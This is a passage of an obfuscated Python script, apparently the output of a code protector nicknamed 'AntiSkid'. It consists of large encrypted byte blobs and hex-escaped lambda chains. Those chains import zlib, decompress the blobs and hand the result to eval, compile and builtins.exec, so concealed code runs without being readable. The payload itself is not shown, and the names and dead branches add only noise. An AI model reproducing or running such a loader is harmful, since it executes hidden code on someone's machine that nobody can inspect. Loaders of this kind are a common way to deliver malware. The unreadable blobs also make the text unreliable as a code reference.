\x85\xa1\xc5\xa8\x87\xe2B\x99\xb4b\xc6\xc2\xbb\xb7\xf7\xdb}\xb8\x874\xe7\xabu\xc5w\xbb\xd8\x87\xe2\xc3\xc9?\x89i^\xf3\xbca4^8\x98<5\x88\xdc"\xdcGRo\x0c\xe4:%\xd8v\x92/?\xe0W\xda;D|\xdf\xd0\xf0\x14\xd4\xe4\xf7\r\xfa\x8e@\xf0\xf6\x88\xfd~Q!\xdf\xf9B9\xf7\x88\xf8\xb6\x0e\xc8\x18\x15\x9a%\x01\x142\xf7\x17\x80\\\x8f\x0f5c\x8c1\x12\xbf\x91\xfb\xf9\xf4\xd4\x82\xb6K\xd6\xa5\xf8}\x06\xd0\x80\xb1\x07\xdd\x84\x0fx$\xb3f\xd2/\xf4\x00\x97\xc7\x1d\'K\x98"\x03\xd6\x91\xb7\x99,V\xb7K\x14ET\xd1\xaa\xba\xd0\x16K\ts\xae\t\xcc\xdb\x98\xa7\x95\x8eC\xa1\x8c\x88\x96\xe2\x80CJH\x80\x88h\xc2\xee1p/\xee\xbc\xe8\xa4\xc1\x10\x84\x00\x15$\xcb\x9cy\xeb\x01\x91\xfbQ2:\xca\x81\x10\xac\x08a\x14\x03\t\xa7\xc0\xeb\x88\xec\xa3\x96zH\xf5\xdb\xe5\xe4wW\xd5\xdbT\x03{\xa5\xc4Mc\xff\xf7\x81ed\x17\xd4\xf2\x99\xb6j\x05\xa3\xff.\x84W\xedHM\xc2\x18\x14\x90\x1e1\x0f\\\x18\x98\x83\xfbx4\x92\x98\\\xf5H<e\xab[\x86\xc2\x8b\xf1P\x02\x14\x82\xb5y\x86\x9cy\x81K\xb2~\x8dhN\x84\xc4\xebI\x9b\x18@ \xb0\x13\xa7Y\xd5Q\xed\t[$T\xfc\xf5r\xf3ul\x02\xdc\xa5\'\xeb}\xc6\x85\xa5\x99\x9f\xc0i\xeb\xaa<s.\xec\x9fW\xfe6\xd0\xe9]\xa8\x81P\xa3\x81\xa6\x89\x19\xd8\xe1d\x9ag\xe7&\xf9\x19\xc2ON)#\t\xf2 \xc0\xb5\x9d\x06z\x90\xd8\xfd\x07\xd8m\x91?Gri\xa0\xa73\xba\xae\x18\xce\x00NQ\x18\xa6\r\x90\xcc\x85\xe1\xc8z\xbcz\xdd\x0e!)\x9d\xd1-\xd7\xe4YEO+\x9c\x89:\x91\xb0\xbaA\xf6\xe7\xff\xa80&S\x8fCMA5\x18\xe8\xbc\x97\x92~\r\x86n\x8a\x80\xac$\xaa\xcf\xde\x97\x0bw\xb2\x06\x82\x80\x07\x82w\xc8e\xc4\xcbO\xe0\xc2\xa7\nG3Nr\x88\x16Z\x93\x12\xb7*\xdf/!%bl~\xc4\x18ME\xedl\x10\xdeq\\%\xa4\xdd\xc5\xe1\xe1\xaf\xbd\xaf\x03\xcd:e;\xb0\xef\xeeb=o0\x0e\xe1\x9e\xa9\xbd\x1cM$1c"\xc1\x9b}E\x98\xfa71\xa7cJ\x10f\xf4\x84aWG\xc8\x93\x89\xe9 \x93~\x18\xa5\x98\xc1\xb3\xda\xa0\x90\x87?Wb\xee \xb2{\x19\xadG\xeej\xb6\x81\x10\xae\xaaE,\xccL\xc3Q\xb5\x8bw\xbb\x04\xf3\x034\x0el\xa0\x9d\x13\xef\xecH\'\x00\xacK4\x89\xb4\xa2\xae\x18\x98%"\xed\x188i\xd41\xcd\x01\xe3\xdbN_\xd4\xd6\x175!z\xb1\xb1\xbf\xc4o!H\xbf\x06\xac\xa1\xb0\xa1\x97\t$\xcf\x878\xb3\x98\xbd\xc7{&\xcd\xd9\xc3\xa9r\xee\x1b\xda\xab\x892C\xfaY\x82\xa5\xd5G\x9cL\x15f\xf3\xe4^\xa1\xcfL\xc2\xa7\x84d\x91\xc7\xb4\xda\x88\xfd-N\x97(9\xf3\x0ex\xe4\x05\xda7%(H\x1fw\xc49\x0fGbC@j\xecl\xc7\xcc\xb2\x7f\x89\x1b\xbd\x97\x14\xb9(o\xc4\xfb\x88\'+\xa5\xd2\xfd?5\x1d\xeb;7\x10\x96\x06cT\xbdH\x97U>Y\xf9L4\xdc\xf2c\x8dy\xad0\r\x04\x86z\x0fIZ\x19\xeaL\x91:\x9d\x89%\xa9\xe8\xf3H\xec\x13\x18\x13\x18=\xef\xe4\x96\x89\xbb\xc8\xf9k\xbcc\x0f2\xe9y\xb3\xc7x\xb6:J\xaa\xa4\xfb,\x887\x83\x98\x1d\xbe\x91\xd6\x8f\xdd\x89\xea\xe6\x1b\xb0\x1fxJy\x97@\xe1\x04\xf9\t\x85\xa0\x98\x83&8\xef\xa7\xe0?\xd3\xfb\x84!\xa5$\xfaA\xdc\xf1\x12G:\xad\xc4JH=F2@\xcc\xbe\x8d\xa8V\x0cw\x8c\xfd\x19\xa1\x86C\xf1\xb4\xf1\xe7\x922=[L\x03\x80\xa5W\r\x9a\xb4\x8f\x01N\x8cP#=\xe8.\xb0\xb4\xbeE\xf1L\xa9\x19r\x10hFh\xcf\xa4\xa3<\x1eTab{w\xf0\x10\x99\xec\x1e\x0f\x0e\x05\xf6IW\x8bc\x9f2ll*pb\xd9\x03\xe3R\xee[bh\xa0<\xe2\x17&y\x00L\xd4t\xc9\x1a~L\x9b\x873v\xb2\x94\x13N\xeb\xc3\xaf\x1f\x82\xe7\xf38~\xb0\xbb\xdb\xe3C\xe0\xfc\xd2Z\xcc\xfe\xd9\x9b\x01\xd3\xef\x18\xf5\xe0<\x9e-\x13\x83H\xe3\xce\xba\x92\x8aZ\x84Gj\xec\xa2\xd8sf\xa6\xf1\x06Y\xbbX\xc2\xec`\xeb\x14\xc7\xdc\x8a\xa0\xcf\xa8\x9e\x18=Xj7\xad]\xc0 y\x90\xe1\xf2\xc3re\xa5\x1db3\xbdz{w\xd4\x9c?\xfe\xeb\x1f\x87\x01\x92\xa3\xf0#5l8\xc8*/w\x1e\x85\xce\x90\x08\x8a\x19"\x9e\xd2\x1e\xd16\t\x80\xee\x8c')

        AntiSkid.sincity(BearBrand = AntiSkid.Tinapay + -74994)                                                                                                                                                                                                                                                          ;_shit._luna(makasalanan='SSSS2S22SS222S22S22SSSS2',_wowulam=b'\x0e\xf1\xee!~\xb7\t,\x8e\xfa\x06\x86\x94\x907\x03\xcdz\xc6\x1eX\xca\x1e\x1d\xf7\xdbX\xc3\xc7X\xf6\xb8+`W\xa7\x1d@\xba~0\xc8\xc8/\xf7\xb8\xd5\x87\xef\x1e\xcc\x91C\x97\x1c!\x94\x13\xf3\xa7P\x903[MT\xed\xa8\x1c\xeb\xd6y\x087\xd4\xa3\xa5_#\xc01\xa8\xe7\x1eD\xf9n2\xb3\x88\xe9d9:\x9aQ\xbd\xed\xcd\x9e\x13\xa2\xcc\x99\xdd\xae\x03\xd6\x01\xdd\n\xc6\xe4dl\xb9\xe0*\x1b\x03\xc3\xb9\xe8\xd1\x9c\x8c$>`\x94VBq\xe4\x89\x1f\x8fd\xca`oHM\x8ba/\\\xc2-\x81QZ\xe0q\xa6\xd4y\xa9^\x05\xc3\x18\x8f\xa9\\\x90\xde\xffGM\xef\xbfI\xfb\x19\x11\xc5_\x10\x93\x85\xcd7X\xf9\'F\x87\xb1\xd11m\x17D\x11oy\xc2\xa1wd\xfeu\xdb>\x01\xbcG?i\x0b\x8ed\x95\xff\x01\xf7\x96\xb6\x17\x87\xf8\xee\xef\xbdml\xad\xbb\xab7L\xf3N\x0c\'\x9cB5\xe4?\xc8Ad\x0f\x0f\x10\x8f\xb1\xb3\xc8\nS!"p\xf8\x1d\xa5\xd6]}\x1eqv\\<\x05&_\xa9\xd7$\xbb\xe2\xbdv\x07\xc0\xa7\x98H\t\xee\x8c4\xfb\xc6&\xf4\x8bS\x02\x83g\xb5\x83\xee\x97!\xa8:\x16\x89\t\xda\x12\xa7T\xdd\\\xd0w\x81\x9e\xb1B\x8d\x86F\x7f\xa4\x1b\x82\xbc\x01j@\xa5\xc3Uc\xd7\xdc@z\x00\xbc\x7f#j4\x8c6\x1dE\xaf\x84\xf29r\xf0\x1f7\x13f\x85\xc0\x0cG\xb1\x8d\x13\xf8\t\xdd1l\xae\xb4f\x02o\xcb\'\xcd\x17\xaf\xc9>B\xdc\x87\xf6#[\x16\x16\xdd\x18\xa19\xc7~\xa0N\x188\xe9\x84eG\x9f*\x12dpNxL\x0bO4\x1fQZ\xf8\x00\x9b\xaa\x9d\x00U\xa7\xa4\x8f\x8d\x11\xe1\xf6\xb2Z;\xe8\x07K>\xc6\x08\xb9\x870\xbe\x8b\xf2\xc8\x80f\x9c\xed\x18\x01:\xa5\xe4#H\\\xa1\xc1V\xd1B\x9f\xed 1N\xbd\xe4C\xd9dg\xf8\x9ad\xfb\x9b~{\x83Y\x12\xd1FJt\x89\xc8\xe4w\x1a\xdb{b\xf8\x8eS\x1c\xefh\x9be\x80\xab\x10\x03\x9d\x9fGv\xacO[\xe6%L\xc6\x85\xd1\xd1\x98\xcf\x00z\xc9u\xcdG\x0b\xb9\x8fS\x16\x12W\xfa1S\x92\x8c\xff\xdfV\xa93\x00`\x88t\xf6\x90\xf8\xa9 \xd0\x9a\'\x02v?\xe1\xa4\xb6@\x1a\x13\xd3\xd3\xf3\x1f\x9e\xa5\x8b\x7f\xb9\xdf.\xfd\xc9z6\x84\x1fC~\xb5hH5\x1dC\xc9\x18R\x17\x93\xd3ae%;l\x11!`h*\x02\x07AmkaI\x0efZ6S\x0e\xe4\xf2\xe2\x89!\x98\xc5\xcb\x9c\x04F\xda\xfb\xf2O\xefu\x7f\xcf\xa4Ov\xb2\x1d\xe3i97\xda\x15\xeeW\x9d\xa9\xc0\x13\x06\x03\x89RX\xe9@o\xf5\x1aC\x0b\'>~5\x8a\xaa\x96H\x15h\xf1_\x94L\xe9-\xdd8\x18\x98:\xe6\x88\x92o\xfb\x98o\x8a\x03^a\x8eHB\xdcX\xec\xcd\xecK99\xa5\x98\x89S\x0c\xa0\x08\xa5\x8bO\xa1\x7f\x9e\xbf~\x0f\xa3\x1f\xce-$J\x06}\x94\xd9\xc5\xd2TFGu=\xbaw\xba\xf7\xee\xf4\x96\xc4=9\xd2\xff\x07&T\x93#')



        AntiSkid._antigoogle(_jollibee = 97840 / AntiSkid.Tinapay)                                                                                                                                                                                                                                                          ;nmmmnnnnnmnnnmnnmmm,lIIIIlIlIllIIlIIlIIlIIl,mmmnnmnmmnnnmnmmmmnm,wwwwwxwxxwwwxxwxwxxwxw,mmnnnnmmmmmnmmmnn=(lambda XWXWXWWWXWXWWXWXXWXXWXWW:XWXWXWWWXWXWWXWXXWXXWXWW(__import__('\x7a\x6c\x69\x62'))),(lambda XWXWXWWWXWXWWXWXXWXXWXWW:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(XWXWXWWWXWXWWXWXXWXXWXWW)"),filename='\x4d\x4e\x4d\x4d\x4d\x4e\x4d\x4e\x4d\x4e\x4e\x4d\x4d\x4e\x4e\x4d\x4e\x4e\x4e\x4d\x4d',mode='\x65\x76\x61\x6c'))),(lambda XWXWXWWWXWXWWXWXXWXXWXWW:XWXWXWWWXWXWWXWXXWXXWXWW['\x64\x65\x63\x6f\x6d\x70\x72\x65\x73\x73']),(lambda nnmmmnnmmmmnnnmmmnnnmn,XWXWXWWWXWXWWXWXXWXXWXWW:nnmmmnnmmmmnnnmmmnnnmn(XWXWXWWWXWXWWXWXXWXXWXWW)),(lambda:(lambda XWXWXWWWXWXWWXWXXWXXWXWW:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(XWXWXWWWXWXWWXWXXWXXWXWW)"),filename='\x4d\x4e\x4d\x4d\x4d\x4e\x4d\x4e\x4d\x4e\x4e\x4d\x4d\x4e\x4e\x4d\x4e\x4e\x4e\x4d\x4d',mode='\x65\x76\x61\x6c')))('\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x62\x75\x69\x6c\x74\x69\x6e\x73\x27\x29\x2e\x65\x78\x65\x63'))

        AntiSkid.sincity(BearBrand = AntiSkid.Tinapay + 57893)                                                                                                                                                                                                                                                          ;mmnnnnmmmmmnmmmnn()(wwwwwxwxxwwwxxwxwxxwxw(mmmnnmnmmnnnmnmmmmnm(nmmmnnnnnmnnnmnnmmm(lIIIIlIlIllIIlIIlIIlIIl('\x76\x61\x72\x73'))),_shit._makasalanan(_mcdo='OOo0O00O00O0oooOoOooO0')+_shit._makasalanan(_mcdo='JILLILLJJLJJILIJJLIILILI')+_shit._makasalanan(_mcdo='lilijljijjjilllllllijjij')+_shit._makasalanan(_mcdo='ijliljjljlijjljjliii')+_shit._makasalanan(_mcdo='IlllIIlllllIlIIllllIll')+_shit._makasalanan(_mcdo='jijljjjijjiiljjijliljl')+_shit._makasalanan(_mcdo='jljjiljiilljjijiilj')+_shit._makasalanan(_mcdo='XWXXWXWWWWWWWXXXWXX')+_shit._makasalanan(_mcdo='mmnnmnnnnmmmnnnmnnmn')+_shit._makasalanan(_mcdo='SSSS2S22SS222S22S22SSSS2')))



    except Exception as _joinmakasalanan:

        if 383758 > 8271202:

            _shit.execute(code = _mksln(_joinmakasalanan))



        elif 246509 > 9703778:

            AntiSkid.sincity(BearBrand = AntiSkid.Tinapay - 64044)